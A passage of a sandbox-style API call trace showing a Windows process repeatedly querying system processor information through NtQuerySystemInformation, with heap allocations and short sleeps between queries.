NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0292.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0292.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0292.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0292.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0292.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0292.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0292.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.173] Sleep (dwMilliseconds=0x110) [0292.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0292.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0292.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0292.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0292.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0292.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0292.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0292.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0292.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.193] Sleep (dwMilliseconds=0x110) [0292.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0292.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0292.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0292.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0292.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0292.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0292.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0292.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0292.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.206] Sleep (dwMilliseconds=0x110) [0292.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0292.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0292.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0292.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0292.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0292.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0292.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0292.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0292.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.220] Sleep (dwMilliseconds=0x110) [0292.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0292.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0292.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0292.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0292.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0292.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0292.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0292.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0292.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.252] Sleep (dwMilliseconds=0x110) [0292.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0292.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0292.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0292.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0292.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0292.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0292.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0292.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0292.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.271] Sleep (dwMilliseconds=0x110) [0292.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0292.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0292.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0292.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0292.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0292.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0292.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0292.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0292.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.284] Sleep (dwMilliseconds=0x110) [0292.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0292.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0292.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0292.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0292.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0292.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0292.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0292.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0292.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.298] Sleep (dwMilliseconds=0x110) [0292.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0292.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0292.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0292.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0292.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0292.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0292.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0292.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0292.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.317] Sleep (dwMilliseconds=0x110) [0292.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0292.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0292.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0292.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0292.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0292.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0292.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0292.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0292.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.332] Sleep (dwMilliseconds=0x110) [0292.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0292.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0292.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0292.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0292.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0292.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0292.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0292.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0292.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.344] Sleep (dwMilliseconds=0x110) [0292.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0292.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0292.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0292.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0292.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0292.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0292.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0292.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0292.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.365] Sleep (dwMilliseconds=0x110) [0292.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0292.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0292.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0292.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0292.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0292.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0292.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0292.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0292.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.378] Sleep (dwMilliseconds=0x110) [0292.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0292.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0292.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0292.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0292.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0292.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0292.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0292.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0292.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 